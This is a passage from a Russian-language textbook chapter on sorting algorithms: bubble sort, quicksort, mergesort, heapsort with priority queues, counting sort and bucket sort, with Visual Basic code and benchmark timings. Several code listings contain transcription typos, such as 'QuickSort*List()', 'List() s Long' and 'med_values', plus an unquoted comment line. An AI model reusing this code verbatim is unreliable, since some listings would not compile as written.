При просмотре массива сверху вниз, элементы, которые перемещаются вверх, сдвигаются всего на одну позицию. Те же элементы, которые перемещаются вниз, сдвигаются на несколько позиций за один проход. Этот факт можно использовать для ускорения работы алгоритма пузырьковой сортировки. Если чередовать просмотр массива сверху вниз и снизу вверх, то перемещение элементов в прямом и обратном направлениях будет одинаково быстрым.
Во время проходов сверху вниз, наибольший элемент списка перемещается на место, а во время проходов снизу вверх — наименьший. Если M элементов списка расположены не на своих местах, алгоритму потребуется не более M проходов для того, чтобы расположить элементы по порядку. Если в списке N элементов, алгоритму потребуется N шагов для каждого прохода. Таким образом, полное время выполнения для этого алгоритма будет порядка O(M * N).
Если первоначально список организован случайным образом, большая часть элементов будет находиться не на своих местах. В примере, приведенном на рис. 9.3, элемент 6 трижды меняется местами с соседними элементами. Вместо выполнения трех отдельных перестановок, можно сохранить значение 6 во временной переменной до тех пор, пока не будет найдено конечное положение элемента. Это может сэкономить большое число шагов алгоритма, если элементы перемещаются на большие расстояния внутри массива.
Последнее улучшение — ограничение проходов массива. После просмотра массива, последние переставленные элементы обозначают часть массива, которая содержит неупорядоченные элементы. При проходе сверху вниз, например, наибольший элемент перемещается в конечное положение. Поскольку нет больших элементов, которые нужно было бы поместить за ним, то можно начать очередной проход снизу вверх с этой точки и на ней же заканчивать следующие проходы сверху вниз.
========237
Таким же образом, после прохода снизу вверх, можно сдвинуть позицию, с которой начнется очередной проход сверху вниз, и будут заканчиваться последующие проходы снизу вверх.
Реализация алгоритма пузырьковой сортировки на языке Visual Basic использует переменные min и max для обозначения первого и последнего элементов списка, которые находятся не на своих местах. По мере того, как алгоритма повторяет проходы по списку, эти переменные обновляются, указывая положение последней перестановки.
Public Sub Bubblesort(List() As Long, ByVal min As Long, ByVal max As Long)
Dim last_swap As Long
Dim i As Long
Dim j As Long
Dim tmp As Long
‘ Повторять до завершения.
Do While min < max
‘ «Всплывание».
last_swap = min - 1
‘ То есть For i = min + 1 To max.
i = min + 1
Do While i <= max
‘ Найти «пузырек».
If List(i - 1) > List(i) Then
‘ Найти, куда его поместить.
tmp = List(i - 1)
j = i
Do
List(j - 1) = List(j)
j = j + 1
If j > max Then Exit Do
Loop While List(j) < tmp
List(j - 1) = tmp
last_swap = j - 1
i = j + 1
Else
i = i + 1
End If
Loop
‘ Обновить переменную max.
max = last_swap - 1
‘ «Погружение».
last_swap = max + 1
‘ То есть For i = max -1 To min Step -1
i = max - 1
Do While i >= min
‘ Найти «пузырек».
If List(i + 1) < List(i) Then
‘ Найти, куда его поместить.
tmp = List(i + 1)
j = i
Do
List(j + 1) = List(j)
j = j - 1
If j < min Then Exit Do
Loop While List(j) > tmp
List(j + 1) = tmp
last_swap = j + 1
i = j - 1
Else
i = i - 1
End If
Loop
‘ Обновить переменную min.
Min = last_swap + 1
Loop
End Sub
==========238
Для того чтобы протестировать алгоритм пузырьковой сортировки при помощи программы Sort, поставьте галочку в поле Sorted (Отсортированные) в области Initial Ordering (Первоначальный порядок). Введите число элементов в поле #Unsorted (Число несортированных). После нажатия на кнопку Go (Начать), программа создает и сортирует список, а затем переставляет случайно выбранные пары элементов. Например, если вы введете число 10 в поле #Unsorted, программа переставит 5 пар чисел, то есть 10 элементов окажутся не на своих местах.
Для второго варианта первоначального алгоритма, программа сохраняет элемент во временной переменной при перемещении на несколько шагов. Этот происходит еще быстрее, если использовать функцию API MemCopy. Алгоритм пузырьковой сортировки в программе FastSort, используя функцию MemCopy, сортирует элементы в 50 или 75 раз быстрее, чем первоначальная версия, реализованная в программе Sort.
В табл. 9.2 приведено время выполнения пузырьковой сортировки 2000 элементов на компьютере с процессором Pentium с тактовой частотой 90 МГц в зависимости от степени первоначальной упорядоченности списка. Из таблицы видно, что алгоритм пузырьковой сортировки обеспечивает хорошую производительность, только если список с самого начала почти отсортирован. Алгоритм быстрой сортировки, который описывается далее в этой главе, способен отсортировать тот же список из 2000 элементов примерно за 0,12 сек, независимо от первоначального порядка расположения элементов в списке. Пузырьковая сортировка может превзойти этот результат, только если примерно 97 процентов списка было упорядочено до начала сортировки.
=====239
@Таблица 9.2. Время пузырьковой сортировки 2.000 элементов
Несмотря на то, что пузырьковая сортировка медленнее, чем многие другие алгоритмы, у нее есть свои применения. Пузырьковая сортировка часто дает наилучшие результаты, если список изначально уже почти упорядочен. Если программа управляет списком, который сортируется при создании, а затем к нему добавляются новые элементы, пузырьковая сортировка может быть лучшим выбором.
Быстрая сортировка
Быстрая сортировка (quicksort) — рекурсивный алгоритм, который использует подход «разделяй и властвуй». Если сортируемый список больше, чем минимальный заданный размер, процедура быстрой сортировки разбивает его на два подсписка, а затем рекурсивно вызывает себя для сортировки двух подсписков.
Первая версия алгоритма быстрой сортировки, обсуждаемая здесь, достаточно проста. Если алгоритм вызывается для подсписка, содержащего не более одного элемента, то подсписок уже отсортирован, и подпрограмма завершает работу.
Иначе, процедура выбирает какойлибо элемент из списка и использует его для разбиения списка на два подсписка. Она помещает элементы, которые меньше, чем выбранный элементы в первый подсписок, а остальные — во второй, и затем рекурсивно вызывает себя для сортировки двух подсписков.
Public Sub QuickSort(List() As Long, ByVal min as Integer, _
ByVal max As Integer)
Dim med_value As Long
Dim hi As Integer
Dim lo As Integer
‘ Если осталось менее 1 элемента, подсписок отсортирован.
If min >= max Then Exit Sub
‘ Выбрать значение для деления списка.
med_value = list(min)
lo = min
hi = max
Do
Просмотр от hi до значения < med_value.
Do While list(hi) >= med_value
hi = hi - 1
If hi <= lo Then Exit Do
Loop
If hi <= lo Then
list(lo) = med_value
Exit Do
End If
‘ Поменять местами значения lo и hi.
list(lo) = list(hi)
‘ Просмотр от lo до значения >= med_value.
lo = lo + 1
Do While list(lo) < med_values
lo = lo + 1
If lo >= hi Then Exit Do
Loop
If lo >= hi Then
lo = hi
list(hi) = med_value
Exit Do
End If
‘ Поменять местами значения lo и hi.
list(hi) = list(lo)
Loop
‘ Рекурсивная сортировка двух подлистов.
QuickSort list(), min, lo - 1
QuickSort list(), lo + 1, max
End Sub
=========240
Есть несколько важных моментов в этой версии алгоритма, которые стоит упомянуть. Вопервых, значение med_value для деления списка не входит ни в один подсписок. Это означает, что в двух подсписках содержится на одни элемент меньше, чем в исходном списке. Т.к. число рассматриваемых элементов уменьшается, то в конечном итоге алгоритм завершит работу.
Эта версия алгоритма использует в качестве разделителя первый элемент в списке. В идеале, это значение должно было бы находиться гдето в середине списка, так чтобы два подсписка были примерно равного размера. Тем не менее, если элементы первоначально почти отсортированы, то первый элемент — наименьший в списке. При этом алгоритм не поместит ни одного элемента в первый подсписок, и все элементы во второй. Последовательность действий алгоритма будет примерно такой, как показано на рис. 9.4.
В этом случае каждый вызов подпрограммы требует порядка O(N) шагов для перемещения всех элементов во второй подсписок. Т.к. алгоритм рекурсивно вызывает себя N - 1 раз, время его выполнения будет порядка O(N2), что не лучше, чем у ранее рассмотренных алгоритмов. Ситуацию еще более ухудшает то, что уровень вложенности рекурсии алгоритма N - 1. Для больших списков огромная глубина рекурсии приведет к переполнению стека и сбою в работе программы.
=========242
@Рис. 9.4. Быстрая сортировка упорядоченного списка
Существует много стратегий выбора разделительного элемента. Можно использовать элемент из середины списка. Это может оказаться неплохим выбором, тем не менее, может оказаться и так, что это окажется наименьший или наибольший элемент списка. При этом один подсписок будет намного больше, чем другой, что приведет к снижению производительности до порядка O(N2) и глубокому уровню рекурсии.
Другая стратегия может заключаться в том, чтобы просмотреть весь список, вычислить среднее арифметическое всех значений, и использовать его в качестве разделительного значения. Этот подход будет давать неплохие результаты, но потребует дополнительных усилий. Дополнительный проход со сложностью порядка O(N) не изменит теоретическое время выполнения алгоритма, но снизит общую производительность.
Третья стратегия — выбрать средний из элементов в начале, конце и середине списка. Преимущество этого подхода в быстроте, потому что потребуется выбрать всего три элемента. При этом гарантируется, что этот элемент не является наибольшим или наименьшим в списке, и вероятно окажется гдето в середине списка.
И, наконец, последняя стратегия, которая используется в программе Sort, заключается в случайном выборе элемента из списка. Возможно, это будет неплохим выбором. Даже если это не так, возможно на следующем шаге алгоритм, возможно, сделает лучший выбор. Вероятность постоянного выпадения наихудшего случая очень мала.
Интересно, что этот метод превращает ситуацию «небольшая вероятность того, что всегда будет плохая производительность» в ситуацию «всегда небольшая вероятность плохой производительности». Это довольно запутанное утверждение объясняется в следующих абзацах.
При использовании других методов выбора точки раздела, существует небольшая вероятность того, что при определенной организации списка время сортировки будет порядка O(N2), Хотя маловероятно, что подобная организация списка в начале сортировки встретится на самом деле, тем не менее, время выполнения при этом будет определенно порядка O(N2), неважно почему. Это то, что можно назвать «небольшой вероятностью того, что всегда будет плохая производительность».
===========242
При случайном выборе точки раздела первоначальное расположение элементов не влияет на производительность алгоритма. Существует небольшая вероятность неудачного выбора элемента, но вероятность того, что это будет происходить постоянно, чрезвычайно мала. Это можно обозначить как «всегда небольшая вероятность плохой производительности». Независимо от первоначальной организации списка, очень маловероятно, что производительность алгоритма будет порядка O(N2).
Тем не менее, все еще остается ситуация, которая может вызвать проблемы при использовании любого из этих методов. Если в списке очень мало различных значений в списке, алгоритм заносит множество одинаковых значений в подсписок при каждом вызове. Например, если каждый элемент в списке имеет значение 1, последовательность выполнения будет такой, как показано на рис. 9.5. Это приводит к большому уровню вложенности рекурсии и дает производительность порядка O(N2).
Похожее поведение происходит также при наличии большого числа повторяющихся значений. Если список состоит из 10.000 элементов со значениями от 1 до 10, алгоритм довольно быстро разделит список на подсписки, каждый из которых содержит только одно значение.
Наиболее простой выход — игнорировать эту проблему. Если вы знаете, что данные не имеют такого распределения, то проблемы нет. Если данные имеют небольшой диапазон значений, то вам стоит рассмотреть другой алгоритм сортировки. Описываемые далее в этой главе алгоритмы сортировки подсчетом и блочной сортировки очень быстро сортируют списки, данных в которых находятся в узком диапазоне.
Можно внести еще одно небольшое улучшение в алгоритм быстрой сортировки. Подобно многих другим более сложным алгоритмам, описанным далее в этой главе, быстрая сортировка — не самый лучший выбор для сортировки небольших списков. Благодаря своей простоте, сортировка выбором быстрее при сортировке примерно десятка записей.
@Рис. 9.5. Быстрая сортировка списка из единиц
==========243
@Таблица 9.3. Время быстрой сортировки 20.000 элементов
Можно улучшить производительность быстрой сортировки, если прекратить рекурсию до того, как подсписки уменьшатся до нуля, и использовать для завершения работы сортировку выбором. В табл. 9.3 приведено время, которое занимает выполнение быстрой сортировки 20.000 элементов на компьютере с процессором Pentium с тактовой частотой 90 МГц, если останавливать сортировку при достижении подсписками определенного размера. В этом тесте оптимальное значение этого параметра было равно 15.
Следующий код демонстрирует доработанный алгоритм:
Public Sub QuickSort*List() As Long, ByVal min As Long, ByVal max As Long)
Dim med_value As Long
Dim hi As Long
Dim lo As Long
Dim i As Long
‘ Если в списке больше, чем CutOff элементов,
‘ завершить его сортировку процедурой SelectionSort.
If max - min < cutOff Then
SelectionSort List(), min, max
Exit Sub
End If
‘ Выбрать разделяющее значение.
i = Int((max - min + 1) * Rnd + min)
med_value = List(i)
‘ Переместить его вперед.
List(i) = List(min)
lo = min
hi = max
Do
‘ Просмотр сверху вниз от hi до значения < med_value.
Do While List(hi) >= med_value
hi = hi - 1
If hi <= lo Then Exit Do
Loop
If hi <= lo Then
List(lo) = med_value
Exit Do
End If
‘ Поменять местами значения lo и hi.
List(lo) = List(hi)
‘ Просмотр снизу вверх от lo до значения >= med_value.
lo = lo + 1
Do While List(lo) < med_value
lo = lo + 1
If lo >= hi Then Exit Do
Loop
If lo >= hi Then
lo = hi
List(hi) = med_value
Exit Do
End If
‘ Поменять местами значения lo и hi.
List(hi) = List(lo)
Loop
‘ Сортировать два подсписка.
QuickSort List(), min, lo - 1
QuickSort List(), lo + 1, max
End Sub
=======244
Многие программисты выбирают алгоритм быстрой сортировки, т.к. он дает хорошую производительность в большинстве обстоятельств.
Сортировка слиянием
Как и быстрая сортировка, сортировка слиянием (mergesort) — это рекурсивный алгоритм. Он также разделяет список на два подсписка, и рекурсивно сортирует подсписки.
Сортировка слиянием делит список пополам, формируя два подсписка одинакового размера. Затем подсписки рекурсивно сортируются, и отсортированные подсписки сливаются, образуя полностью отсортированный список.
Хотя этап слияния легко понять, это наиболее интересная часть алгоритма. Подсписки сливаются во временный массив, и результат копируется в первоначальный список. Создание временного массива может быть недостатком, особенно если размер элементов велик. Если размер временного размера очень большой, он может приводить к обращению к файлу подкачки и значительно снижать производительность. Работа с временным массивом также приводит к тому, что большая часть времени уходит на копирование элементов между массивами.
Так же, как и в случае с быстрой сортировкой, можно ускорить выполнение сортировки слиянием, остановив рекурсию, когда подсписки достигают определенного минимального размера. Затем можно использовать сортировку выбором для завершения работы.
=========245
Public Sub Mergesort(List() As Long, Scratch() As Long, _
ByVal min As Long, ByVal max As Long)
Dim middle As Long
Dim i1 As Long
Dim i2 As Long
Dim i3 As Long
‘ Если в списке больше, чем CutOff элементов,
‘ завершить его сортировку процедурой SelectionSort.
If max - min < CutOff Then
Selectionsort List(), min, max
Exit Sub
End If
‘ Рекурсивная сортировка подсписков.
middle = max \ 2 + min \ 2
Mergesort List(), Scratch(), min, middle
Mergesort List(), Scratch(), middle + 1, max
‘ Слить отсортированные списки.
i1 = min ‘ Индекс списка 1.
i2 = middle + 1 ‘ Индекс списка 2.
i3 = min ‘ Индекс объединенного списка.
Do While i1 <= middle And i2 <= max
If List(i1) <= List(i2) Then
Scratch(i3) = List(i1)
i1 = i1 + 1
Else
Scratch(i3) = List(i2)
i2 = i2 + 1
end If
i3 = i3 + 1
Loop
‘ Очистка непустого списка.
Do While i1 <= middle
Scratch(i3) = List(i1)
i1 = i1 + 1
i3 = i3 + 1
Loop
Do While i2 <= max
Scratch(i3) = List(i2)
i2 = i2 + 1
i3 = i3 + 1
Loop
‘ Поместить отсортированный список на место исходного.
For i3 = min To max
List(i3) = Scratch(i3)
Next i3
End Sub
========246
Сортировка слиянием тратит много времени на копирование временного массива на место первоначального. Программа FastSort использует функцию API MemCopy, чтобы немного ускорить эту операцию.
Даже с использованием функции MemCopy, сортировка слиянием немного медленнее, чем быстрая сортировка. В нашем тесте на компьютере с процессором Pentium с тактовой частотой 90 МГц, сортировка слиянием потребовала 2,95 сек для упорядочения 30.000 элементов со значениями в диапазоне от 1 до 10.000. Быстрая сортировка потребовала всего 2,44 сек.
Преимущество сортировки слиянием в том, что время ее выполнения остается одинаковым независимо от различных распределений и начального расположения данных. Быстрая же сортировка дает производительность порядка O(N2) и достигает глубокого уровня вложенности рекурсии, если список содержит много одинаковых значений. Если список большой, быстрая сортировка может переполнить стек и привести к аварийному завершению работы программы. Сортировка слиянием никогда не достигает слишком глубокого уровня вложенности рекурсии, т.к. всегда делит список на равные части. Для списка из N элементов, глубина вложенности рекурсии для сортировки слиянием составляет всего лишь log(N).
В другом тесте, в котором использовались 30.000 элементов со значениями от 1 до 100, сортировка слиянием потребовала столько же времени, сколько и для элементов со значениями от 1 до 10.000 — 2,95 секунд. Быстрая сортировка заняла 15,82 секунды. Если значения лежали между 1 и 50, сортировка слиянием потребовала 2,95 секунд, тогда как быстрая сортировка — 138,52 секунды.
Пирамидальная сортировка
Пирамидальная сортировка (heapsort) использует специальную структуру, называемую пирамидой (heap), для организации элементов в списке. Пирамиды интересны сами по себе и полезны при реализации приоритетных очередей.
В начале этой главы описываются пирамиды, и объясняется, как вы можете реализовать пирамиды на языке Visual Basic. Затем показано, как использовать пирамиду для построения эффективной приоритетной очереди. Располагая средствами для управления пирамидами и приоритетными очередями, легко реализовать алгоритм пирамидальной сортировки.
Пирамиды
Пирамида (heap) — это полное двоичное дерево, в котором каждый узел не меньше, чем оба его потомка. Это ничего не говорит о взаимосвязи между потомками. Они должны быть меньше родителя, но любой из них может быть больше, чем другой. На рис. 9.6 показана небольшая пирамида.
Поскольку каждый узел не меньше, чем два нижележащих узла, корень дерева — всегда наибольший элемент в пирамиде. Это делает пирамиды удобной структурой данных для реализации приоритетных очередей. Если вам нужен элемент очереди с самым высоким приоритетом, он всегда находится на вершине пирамиды.
=========247
Рис. 9.6. Пирамида
Поскольку пирамида является полным двоичным деревом, вы можете использовать методы, изложенные в 6 главе, для сохранения пирамиды в массиве. Поместите корневой узел в 1 позицию массива. Потомки узла I размещаются в позициях 2 * I и 2 * I + 1. Рис. 9.7 показывает пирамиду с рис. 9.6, записанную в виде массива.
Чтобы понять, как устроена пирамида, заметим, что пирамида создана из пирамид меньшего размера. Поддерево, начинающееся с любого узла пирамиды, также является пирамидой. Например, в пирамиде, показанной на рис. 9.8, поддерево с корнем в узле 13 также является пирамидой.
Используя этот факт, можно построить пирамиду снизу вверх. Вначале, разместим элементы в виде дерева, как показано на рис. 9.9. Затем организуем пирамиды из небольших поддеревьев внизу дерева. Поскольку в них всего по три узла, сделать это достаточно просто. Сравним вершину с каждым из потомков. Если один из потомков больше, он меняется местами с родителем. Если оба потомка больше, больший потомок меняется местами с родителем. Этот шаг повторяется до тех пор, пока все поддеревья, имеющие по 3 узла, не будут преобразованы в пирамиды, как показано на рис. 9.10.
Теперь объединим маленькие пирамиды для создания более крупных пирамид. Соединим на рис. 9.10 маленькие пирамиды с вершинами 15 и 5 и элемент, создав пирамиду большего размера. Сравним новую вершину 7 с каждым из потомков. Если один из потомков больше, поменяем его местами с вершиной. В нашем случае 15 больше, чем 7 и 4, поэтому узел 15 меняется местами с узлом 7.
Поскольку правое поддерево, начинающееся с узла 4, не изменялось, это поддерево попрежнему является пирамидой. Левое же поддерево изменилось. Чтобы определить, является ли оно все еще пирамидой, сравним его новую вершину 7 с потомками 13 и 12. Поскольку 13 больше, чем 7 и 12, необходимо поменять местами узлы 7 и 13.
@Рис. 9.7. Представление пирамиды в виде массива
========248
@Рис. 9.8. Пирамида образуется из меньших пирамид
@Рис. 9.9. Неупорядоченный список в полном дереве
@Рис. 9.10. Поддеревья второго уровня являются пирамидами
=========249
@Рис. 9.11. Объединение пирамид в пирамиду большего размера
Если поддерево выше, можно продолжить перемещение узла 7 вниз по поддереву. В конце концов, либо будет достигнута точка, в которой узел 7 больше обоих своих потомков, либо алгоритм достигнет основания дерева. На рис. 9.11 показано дерево после преобразования этого поддерева в пирамиду.
Продолжим объединение пирамид, образуя пирамиды большего размера до тех пор, пока все элементы не образуют одну большую пирамиду, такую как на рис. 9.6.
Следующий код перемещает элемент из положения List(min) вниз по пирамиде. Если поддеревья ниже List(min) являются пирамидами, то процедура сливает пирамиды, образуя пирамиду большего размера.
Private Sub HeapPushDown(List() s Long, ByVal min As Long, _
ByVal max As Long)
Dim tmp As Long
Dim j As Long
tmp = List(min)
Do
j = 2 * min
If j <= max Then
‘ Разместить в j указатель на большего потомка.
If j < max Then
If List(j + 1) > List(j) Then _
j = j + 1
End If
If List(j) > tmp Then
‘ Потомок больше. Поменять его местами с родителем.
List(min) = List(j)
‘ Перемещение этого потомка вниз.
min = j
Else
‘ Родитель больше. Процедура закончена.
Exit Do
End If
Else
Exit Do
End If
Loop
List(min) = tmp
End Sub
Полный алгоритм, использующий процедуру HeapPushDown для создания пирамиды из дерева элементов, необычайно прост:
Private Sub BuildHeap()
Dim i As Integer
For i = (max + min) \ 2 To min Step -1
HeapPushDown list(), i, max
Next i
End Sub
Приоритетные очереди
Приоритетной очередью (priority queue) легко управлять при помощи процедур BuildHeap и HeapPushDown. Если в качестве приоритетной очереди используется пирамида, легко найти элемент с самым высоким приоритетом — он всегда находится на вершине пирамиды. Но если его удалить, получившееся дерево без корня уже не будет пирамидой.
Для того, чтобы снова превратить дерево без корня в пирамиду, возьмем последний элемент (самый правый элемент на нижнем уровне) и поместим его на вершину пирамиды. Затем при помощи процедуры HeapPushDown продвинем новый корневой узел вниз по дереву до тех пор, пока дерево снова не станет пирамидой. В этот момент, можно получить на выходе приоритетной очереди следующий элемент с наивысшим приоритетом.
Public Function Pop() As Long
If NumInQueue < 1 Then Exit Function
' Удалить верхний элемент.
Pop = Pqueue(1)
' Переместить последний элемент на вершину.
PQueue(1) = PQueue(NumInPQueue)
NumInPQueue = NumInPQueue - 1
' Снова сделать дерево пирамидой.
HeapPushDown PQueue(), 1, NumInPQueue
End Function
Чтобы добавить новый элемент к приоритетной очереди, увеличьте пирамиду. Поместите новый элемент на свободное место в конце массива. Полученное дерево также не будет пирамидой.
Чтобы снова преобразовать его в пирамиду, сравните новый элемент с его родителем. Если новый элемент больше, поменяйте их местами. Заранее известно, что второй потомок меньше, чем родитель, поэтому нет необходимости сравнивать новый элемент с другим потомком. Если элемент больше родителя, то он также больше и второго потомка.
Продолжайте сравнение нового элемента с родителем и перемещение его по дереву, пока не найдется родитель, больший, чем новый элемент. В этот момент, дерево снова представляет собой пирамиду, и приоритетная очередь готова к работе.
Private Sub HeapPushUp(List() As Long, ByVal max As Integer)
Dim tmp As Long
Dim j As Integer
tmp = List (max)
Do
j = max \ 2
If j < 1 Then Exit Do
If List(j) < tmp Then
List (max) = List(j)
max = j
Else
Exit Do
End If
Loop
List(max) = tmp
End Sub
Подпрограмма Push добавляет новый элемент к дереву и использует подпрограмму HeapPushDown для восстановления пирамиды.
Public Sub Push (value As Long)
NumInPQueue = NumInPQueue + 1
If NumInPQueue > PQueueSize Then ResizePQueue
PQueue(NumInPQueue) = value
HeapPushUp PQueue(), NumInPQueue
End Sub
========252
Анализ пирамид
При первоначальном превращении списка в пирамиду, это осуществляется при помощи создания множества пирамид меньшего размера. Для каждого внутреннего узла дерева строится пирамида с корнем в этом узле. Если дерево содержит N элементов, то в дереве O(N) внутренних узлов, и в итоге приходится создать O(N) пирамид.
При создании каждой пирамиды может потребоваться продвигать элемент вниз по пирамиде, возможно до тех пор, пока он не достигнет концевого узла. Самые высокие из построенных пирамид будут иметь высоту порядка O(log(N)). Так как создается O(N) пирамид, и для построения самой высокой из них требуется O(log(n)) шагов, то все пирамиды можно построить за время порядка O(N * log(N)).
На самом деле времени потребуется еще меньше. Только некоторые пирамиды будут иметь высоту порядка O(log(N)). Большинство из них гораздо ниже. Только одна пирамида имеет высоту, равную log(N), и половина пирамид — высоту всего в 2 узла. Если суммировать все шаги, необходимые для создания всех пирамид, в действительности потребуется не больше O(N) шагов.
Чтобы увидеть, так ли это, допустим, что дерево содержит N узлов. Пусть H — высота дерева. Это полное двоичное дерево, следовательно, H=log(N).
Теперь предположим, что вы строите все большие и большие пирамиды. Для каждого узла, который находится на расстоянии H-I уровней от корня дерева, строится пирамида с высотой I. Всего таких узлов 2H-I, и всего создается 2H-I пирамид с высотой I.
Для построения этих пирамид может потребоваться передвигать элемент вниз до тех пор, пока он не достигнет концевого узла. Перемещение элемента вниз по пирамиде с высотой I требует до I шагов. Для пирамид с высотой I полное число шагов, которое потребуется для построения 2H-I пирамид, равно I*2H-I.
Сложив все шаги, затрачиваемые на построение пирамид разного размера, получаем 1*2H-1+2*2H-2+3*2H-3+…+(H-1)* 21. Вынеся за скобки 2H, получим 2H*(1/2+2/22+3/23+…+(H-1)/2H-1).
Можно показать, что (1/2+2/22+3/23+…+(H-1)/2H-1) меньше 2. Тогда полное число шагов, которое нужно для построения всех пирамид, меньше, чем 2H*2. Так как H — высота дерева, равная log(N), то полное число шагов меньше, чем 2log(N)*2=N*2. Это означает, что для первоначального построения пирамиды требуется порядка O(N) шагов.
Для удаления элемента из приоритетной очереди, последний элемент перемещается на вершину дерева. Затем он продвигается вниз, пока не займет свое окончательное положение, и дерево снова не станет пирамидой. Так как дерево имеет высоту log(N), процесс может занять не более log(N) шагов. Это означает, что новый элемент к приоритетной очереди на основе пирамиды можно добавить за O(log(N)) шагов.
Другим способом работы с приоритетными очередями является использование упорядоченного списка. Вставка или удаление элемента из упорядоченного списка с миллионом элементов занимает примерно миллион шагов. Вставка или удаление элемента из сопоставимой по размерам приоритетной очереди, основанной на пирамиде, занимает всего 20 шагов.
======253
Алгоритм пирамидальной сортировки
Алгоритм пирамидальной сортировки просто использует уже описанные алгоритмы для работы с пирамидами. Идея состоит в том, чтобы создать приоритетную очередь и последовательно удалять по одному элементу из очереди.
Для удаления элемента алгоритм меняет его местами с последним элементом в пирамиде. Это помещает удаленный элемент в конечное положение в конце массива. Затем алгоритм уменьшает счетчик элементов списка, чтобы исключить из рассмотрения последнюю позицию
После того, как наибольший элемент поменялся местами с последним, массив больше не является пирамидой, так как новый элемент на вершине может оказаться меньше, чем его потомки. Поэтому алгоритм использует процедуру HeapPushDown для продвижения элемента на его место. Алгоритм продолжает менять элементы местами и восстанавливать пирамиду до тех пор, пока в пирамиде не останется элементов.
Public Sub Heapsort(List() As Long, ByVal min As Long, ByVal max As Long)
Dim i As Long
Dim tmp As Long
' Создать пирамиду (кроме корневого узла).
For i = (max + min) \ 2 To min + 1 Step -1
HeapPushDown List(), i, max
Next i
' Повторять:
' 1. Продвинуться вниз по пирамиде.
' 2. Выдать корень.
For i = max To min + 1 Step -1
' Продвинуться вниз по пирамиде.
HeapPushDown List(), min, i
' Выдать корень.
tmp = List(min)
List(min) = List(i)
List(i) = tmp
Next i
End Sub
Предыдущее обсуждение приоритетных очередей показало, что первоначальное построение пирамиды требует O(N) шагов. После этого требуется O(log(N)) шагов для восстановления пирамиды, когда элемент продвигается на свое место. Пирамидальная сортировка выполняет это действие N раз, поэтому требуется всего порядка O(N)*O(log(N))=O(N*log(N)) шагов, чтобы получить из пирамиды упорядоченный список. Полное время выполнения для алгоритма пирамидальной сортировки составляет порядка O(N)+O(N*log(N))=O(N*log(N)).
=========254
Такой же порядок сложности имеет алгоритм сортировки слиянием и в среднем алгоритм быстрой сортировки. Так же, как и сортировка слиянием, пирамидальная сортировка тоже не зависит от значений или распределения элементов до начала сортировки. Быстрая сортировка плохо работает со списками, содержащими большое число одинаковых элементов, а сортировка слиянием и пирамидальная сортировка лишены этого недостатка.
Хотя обычно пирамидальная сортировка работает немного медленнее, чем сортировка слиянием, для нее не требуется дополнительного пространства для хранения временных значений, как для сортировки слиянием. Пирамидальная сортировка создает первоначальную пирамиду и упорядочивает элементы в пределах исходного массива списка.
Сортировка подсчетом
Сортировка подсчетом (countingsort) — специализированный алгоритм, который очень хорошо работает, если элементы данных — целые числа, значения которых находятся в относительно узком диапазоне. Этот алгоритм работает достаточно быстро, например, если значения находятся между 1 и 1000.
Если список удовлетворяет этим требованиям, сортировка подсчетом выполняется невероятно быстро. В одном из тестов на компьютере с процессором Pentium с тактовой частотой 90 МГц, быстрая сортировка 100.000 элементов со значениями между 1 и 1000 заняла 24,44 секунды. Для сортировки тех же элементов сортировке подсчетом потребовалось всего 0,88 секунд — в 27 раз меньше времени.
Выдающаяся скорость сортировки подсчетом достигается за счет того, что при этом не используются операции сравнения. Ранее в этой главе отмечалось, что время выполнения любого алгоритма сортировки, использующего операции сравнения, порядка O(N*log(N)). Без использования операций сравнения, алгоритм сортировки подсчетом позволяет упорядочивать элементы за время порядка O(N).
Сортировка подсчетом начинается с создания массива для подсчета числа элементов, имеющих определенное значение. Если значения находятся в диапазоне между min_value и max_value, алгоритм создает массив Counts с нижней границей min_value и верхней границей max_value. Если используется массив из предыдущего прохода, необходимо обнулить значения его элементов. Если существует M значений элементов, массив содержит M записей, и время выполнения этого шага порядка O(M).
For i = min To max
Counts(List(i)) = Counts(List(i)) + 1
Next i
В конце концов, алгоритм обходит массив Counts, помещая соответствующее число элементов в отсортированный массив. Для каждого значения i между min_value и max_value, он помещает Counts(i) элементов со значением i в массив. Так как этот шаг помещает по одной записи в каждую позицию в массиве, он требует порядка O(N) шагов.
new_index = min
For i = min_value To max_value
For j = 1 To Counts(i)
sorted_list(new_index) = i
new_index = new_index + 1
Next j
Next i
======255
Алгоритм целиком требует порядка O(M)+O(N)+O(N)=O(M+N) шагов. Если M мало по сравнению с N, он выполняется очень быстро. Например, если M<N, то O(M+N)=O(N), что довольно быстро. Если N=100.000 и M=1000, то M+N=101.000, тогда как N*log(N)=1,6 миллиона. Шаги, выполняемые алгоритмом сортировки подсчетом, также относительно просты по сравнению с шагами быстрой сортировки. Все эти факты объединяются, обеспечивая вместе невероятно высокую скорость выполнения сортировки подсчетом.
С другой стороны, если M больше, чем O(N*log(N)), тогда O(M+N) будет больше, чем O(N*log(N)). В этом случае сортировка подсчетом может оказаться медленнее, чем алгоритмы со сложностью порядка O(N*log(N)), такие как быстрая сортировка. В одном из тестов быстрая сортировка 1000 элементов со значениями от 1 до 500.000 потребовал 0,054 сек, в то время как сортировка подсчетом потребовала 1,76 секунд.
Сортировка подсчетом опирается на тот факт, что значения данных — целые числа, поэтому этот алгоритм не может просто сортировать данные других типов. В Visual Basic нельзя создать массив с границами от AAA до ZZZ.
Ранее в этой главе в разделе «объединение и сжатие ключей» было продемонстрировано, как можно кодировать строковые данные при помощи целых чисел. Если вы может закодировать данные при помощи данных типа Integer или Long, вы все еще можете использовать сортировку подсчетом.
Блочная сортировка
Как и сортировка подсчетом, блочная сортировка (bucketsort) не использует операций сравнения элементов. Этот алгоритм использует значения элементов для разбиения их на блоки, и затем рекурсивно сортирует полученные блоки. Когда блоки становятся достаточно малыми, алгоритм останавливается и использует более простой алгоритм типа сортировки выбором для завершения процесса.
По смыслу этот алгоритм похож на быструю сортировку. Быстрая сортировка разделяет элементы на два подсписка и рекурсивно сортирует подсписки. Блочная сортировка делает то же самое, но делит список на множество блоков, а не на всего лишь два подсписка.
Для деления списка на блоки, алгоритм предполагает, что значения данных распределены равномерно, и распределяет элементы по блокам равномерно. Например, предположим, что данные имеют значения в диапазоне от 1 до 100 и алгоритм использует 10 блоков. Алгоритм помещает элементы со значениями 110 в первый блок, со значениями 1120 — во второй, и т.д. На рис. 9.12 показан список из 10 элементов со значениями от 1 до 100, которые расположены в 10 блоках.
@Рис. 9.12. Расположение элементов в блоках.
=======256
